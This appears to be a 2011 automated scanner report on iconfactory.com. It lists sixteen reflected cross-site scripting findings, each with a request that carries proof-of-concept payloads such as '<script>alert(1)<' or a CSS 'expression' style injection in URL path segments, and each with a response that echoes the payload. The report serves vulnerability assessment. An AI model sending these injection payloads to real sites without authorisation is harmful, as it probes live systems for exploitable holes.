1. Cross-site scripting (reflected)
1.1. http://iconfactory.com/favicon.ico [REST URL parameter 1]
1.2. http://iconfactory.com/home [REST URL parameter 1]
1.3. http://iconfactory.com/home/about [REST URL parameter 1]
1.4. http://iconfactory.com/home/about [REST URL parameter 2]
1.5. http://iconfactory.com/home/technology [REST URL parameter 1]
1.6. http://iconfactory.com/home/technology [REST URL parameter 2]
1.7. http://iconfactory.com/software/ipulse [REST URL parameter 1]
1.8. http://iconfactory.com/software/ipulse [REST URL parameter 2]
1.9. http://iconfactory.com/stylesheets/base.css [REST URL parameter 1]
1.10. http://iconfactory.com/stylesheets/base.css [REST URL parameter 2]
1.11. http://iconfactory.com/stylesheets/content.css [REST URL parameter 1]
1.12. http://iconfactory.com/stylesheets/content.css [REST URL parameter 2]
1.13. http://iconfactory.com/stylesheets/iphone.css [REST URL parameter 1]
1.14. http://iconfactory.com/stylesheets/iphone.css [REST URL parameter 2]
1.15. http://iconfactory.com/stylesheets/mainshell.css [REST URL parameter 1]
1.16. http://iconfactory.com/stylesheets/mainshell.css [REST URL parameter 2]
Severity: | High |
Confidence: | Certain |
Host: | http://iconfactory.com |
Path: | /favicon.ico |
GET /favicon.ico76031<script>alert(1)< Host: iconfactory.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Content-Length: 4061 Date: Thu, 10 Feb 2011 23:21:24 GMT Server: lighttpd/1.4.11 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="content ...[SNIP]... <h3 class="first headtitle"> favicon.ico76031<script>alert(1)< </h3> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://iconfactory.com |
Path: | /home |
GET /home3323b<script>alert(1)< Host: iconfactory.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Content-Length: 4058 Date: Thu, 10 Feb 2011 23:20:56 GMT Server: lighttpd/1.4.11 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="content ...[SNIP]... <h3 class="first headtitle"> home3323b<script>alert(1)< </h3> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://iconfactory.com |
Path: | /home/about |
GET /homeb2de3<script>alert(1)< Host: iconfactory.com Proxy-Connection: keep-alive Referer: http://iconfactory.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Content-Length: 4110 Date: Thu, 10 Feb 2011 23:22:58 GMT Server: lighttpd/1.4.11 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="content ...[SNIP]... <h3 class="first headtitle"> homeb2de3<script>alert(1)< </h3> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://iconfactory.com |
Path: | /home/about |
GET /home/aboutea754<x%20style%3dx Host: iconfactory.com Proxy-Connection: keep-alive Referer: http://iconfactory.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Content-Length: 4185 Date: Thu, 10 Feb 2011 23:23:14 GMT Server: lighttpd/1.4.11 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="content ...[SNIP]... <h3 class="first headtitle"> home/aboutea754<x style=x:expr/**/ession </h3> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://iconfactory.com |
Path: | /home/technology |
GET /homedf518<script>alert(1)< Host: iconfactory.com Proxy-Connection: keep-alive Referer: http://iconfactory.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Content-Length: 4125 Date: Thu, 10 Feb 2011 23:23:26 GMT Server: lighttpd/1.4.11 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="content ...[SNIP]... <h3 class="first headtitle"> homedf518<script>alert(1)< </h3> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://iconfactory.com |
Path: | /home/technology |
GET /home/technology5478a<x%20style%3dx Host: iconfactory.com Proxy-Connection: keep-alive Referer: http://iconfactory.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Content-Length: 4200 Date: Thu, 10 Feb 2011 23:23:38 GMT Server: lighttpd/1.4.11 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="content ...[SNIP]... <h3 class="first headtitle"> home/technology5478a<x style=x:expr/**/ession </h3> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://iconfactory.com |
Path: | /software/ipulse |
GET /softwareddc9b<script>alert(1)< Host: iconfactory.com Proxy-Connection: keep-alive Referer: http://iconfactory.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Content-Length: 4125 Date: Thu, 10 Feb 2011 23:23:36 GMT Server: lighttpd/1.4.11 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="content ...[SNIP]... <h3 class="first headtitle"> softwareddc9b<script>alert(1)< </h3> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://iconfactory.com |
Path: | /software/ipulse |
GET /software/ipulse4ae3c<x%20style%3dx Host: iconfactory.com Proxy-Connection: keep-alive Referer: http://iconfactory.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Content-Length: 4200 Date: Thu, 10 Feb 2011 23:23:48 GMT Server: lighttpd/1.4.11 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="content ...[SNIP]... <h3 class="first headtitle"> software/ipulse4ae3c<x style=x:expr/**/ession </h3> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://iconfactory.com |
Path: | /stylesheets/base.css |
GET /stylesheetsd4837<script>alert(1)< Host: iconfactory.com Proxy-Connection: keep-alive Referer: http://iconfactory.com Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Content-Length: 4132 Date: Thu, 10 Feb 2011 23:21:29 GMT Server: lighttpd/1.4.11 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="content ...[SNIP]... <h3 class="first headtitle"> stylesheetsd4837<script>alert(1)< </h3> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://iconfactory.com |
Path: | /stylesheets/base.css |
GET /stylesheets/base.csseadba<script>alert(1)< Host: iconfactory.com Proxy-Connection: keep-alive Referer: http://iconfactory.com Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Content-Length: 4122 Date: Thu, 10 Feb 2011 23:21:37 GMT Server: lighttpd/1.4.11 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="content ...[SNIP]... <h3 class="first headtitle"> stylesheets/base.csseadba<script>alert(1)< </h3> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://iconfactory.com |
Path: | /stylesheets/content.css |
GET /stylesheets87cde<script>alert(1)< Host: iconfactory.com Proxy-Connection: keep-alive Referer: http://iconfactory.com Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Content-Length: 4141 Date: Thu, 10 Feb 2011 23:22:00 GMT Server: lighttpd/1.4.11 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="content ...[SNIP]... <h3 class="first headtitle"> stylesheets87cde<script>alert(1)< </h3> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://iconfactory.com |
Path: | /stylesheets/content.css |
GET /stylesheets/content.css48361<script>alert(1)< Host: iconfactory.com Proxy-Connection: keep-alive Referer: http://iconfactory.com Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Content-Length: 4131 Date: Thu, 10 Feb 2011 23:22:08 GMT Server: lighttpd/1.4.11 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="content ...[SNIP]... <h3 class="first headtitle"> stylesheets/content.css48361<script>alert(1)< </h3> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://iconfactory.com |
Path: | /stylesheets/iphone.css |
GET /stylesheetsc20ce<script>alert(1)< Host: iconfactory.com Proxy-Connection: keep-alive Referer: http://iconfactory.com Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Content-Length: 4138 Date: Thu, 10 Feb 2011 23:21:29 GMT Server: lighttpd/1.4.11 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="content ...[SNIP]... <h3 class="first headtitle"> stylesheetsc20ce<script>alert(1)< </h3> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://iconfactory.com |
Path: | /stylesheets/iphone.css |
GET /stylesheets/iphone.css3174a<script>alert(1)< Host: iconfactory.com Proxy-Connection: keep-alive Referer: http://iconfactory.com Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Content-Length: 4128 Date: Thu, 10 Feb 2011 23:21:37 GMT Server: lighttpd/1.4.11 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="content ...[SNIP]... <h3 class="first headtitle"> stylesheets/iphone.css3174a<script>alert(1)< </h3> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://iconfactory.com |
Path: | /stylesheets/mainshell |
GET /stylesheets9cefc<script>alert(1)< Host: iconfactory.com Proxy-Connection: keep-alive Referer: http://iconfactory.com Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Content-Length: 4147 Date: Thu, 10 Feb 2011 23:21:33 GMT Server: lighttpd/1.4.11 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="content ...[SNIP]... <h3 class="first headtitle"> stylesheets9cefc<script>alert(1)< </h3> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://iconfactory.com |
Path: | /stylesheets/mainshell |
GET /stylesheets/mainshell Host: iconfactory.com Proxy-Connection: keep-alive Referer: http://iconfactory.com Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Content-Length: 4137 Date: Thu, 10 Feb 2011 23:21:41 GMT Server: lighttpd/1.4.11 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="content ...[SNIP]... <h3 class="first headtitle"> stylesheets/mainshell.css313dc<script>alert(1)< </h3> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://iconfactory.com |
Path: | /home |
GET /robots.txt HTTP/1.0 Host: iconfactory.com |
HTTP/1.0 200 OK Connection: close Content-Type: text/plain ETag: "-321751057" Accept-Ranges: bytes Last-Modified: Tue, 07 Oct 2008 16:22:09 GMT Content-Length: 189 Date: Thu, 10 Feb 2011 23:20:23 GMT Server: lighttpd/1.4.11 # See http://www.robotstxt.org User-agent: * Disallow: /flash Disallow: /graphics Disallow: /images Disallow: /assets |